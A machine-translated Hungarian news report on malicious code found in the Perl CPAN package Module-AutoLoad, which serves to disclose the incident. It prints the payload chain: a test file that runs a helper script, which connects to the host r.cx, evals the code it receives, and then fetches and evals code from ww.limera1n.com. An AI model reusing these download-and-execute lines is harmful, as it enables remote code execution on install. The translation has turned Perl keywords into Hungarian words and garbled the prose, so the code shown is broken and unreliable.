Rosszindulatú kódot észleltünk a Module-AutoLoad Perl csomagban

A CPAN-könyvtáron keresztül terjesztett Perl-csomagban Modul-AutoLoad, amelyet a CPAN-modulok menet közbeni automatikus betöltésére terveztek, azonosított rosszindulatú kód. A rosszindulatú betét az volt megtalált a tesztkódban 05_rcx.t, amelyet 2011 óta szállítanak.
Figyelemre méltó, hogy kérdéses kód betöltésével kapcsolatos kérdések merültek fel StackOverflow még 2016-ban.

A rosszindulatú tevékenység egy harmadik féltől származó kiszolgálóról (http://r.cx:1/) származó kód letöltésére és végrehajtására irányuló kísérletben merül ki a modul telepítésekor elindított tesztcsomag végrehajtása során. Feltételezhető, hogy a külső kiszolgálóról eredetileg letöltött kód nem volt rosszindulatú, de most a kérés a ww.limera1n.com tartományba kerül, amely a kód rá eső részét biztosítja a végrehajtáshoz.

A letöltés fájlba rendezése 05_rcx.t A következő kódot használják:

én $prog = __FÁJL__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

A megadott kód hatására a szkript végrehajtásra kerül ../contrib/RCX.pl, amelynek tartalma a következő sorra redukálódik:

használja a lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

Ez a szkript betöltődik zavaros a szolgáltatás igénybevételével perlobfuscator.com kódot az r.cx külső gazdagépről (a 82.46.99.88 karakterkódok az "R.cX" szövegnek felelnek meg), és végrehajtja az eval blokkban.

$ perl -MIO::Socket -e'$b=új IO::Socket::INET 82.46.99.88.":1″; nyomtat <$b>;'
eval kicsomagolás u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Kicsomagolás után végül a következő történik: kód:

print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1

A problémás csomagot eltávolították a tárolóból. PAUSE (Perl Authors Upload Server), és a modul szerzőjének fiókja blokkolva van. Ebben az esetben a modul továbbra is megmarad elérhető a MetaCPAN archívumban, és közvetlenül telepíthető a MetaCPAN-ból néhány segédprogram, például a cpanminus segítségével. Megjegyezzükhogy a csomagot nem terjesztették széles körben.

Érdekes megvitatni csatlakoztatva és a modul szerzője, aki cáfolta azokat az információkat, amelyek szerint rosszindulatú kódot illesztettek volna be, miután feltörték az „r.cx” webhelyét, és elmagyarázta, hogy csak szórakozott, és a perlobfuscator.com webhelyet nem azért használta, hogy elrejtse valamit, hanem a méret csökkentésére. leegyszerűsíti a vágólapon keresztüli másolását. A „botstrap” függvény nevének megválasztását az magyarázza, hogy ez a „botnak hangzik, és rövidebb, mint a bootstrap” szó. A modul szerzője arról is biztosított, hogy az azonosított manipulációk nem hajtanak végre rosszindulatú műveleteket, csak a kód TCP-n keresztüli betöltését és végrehajtását demonstrálják.

Forrás: opennet.ru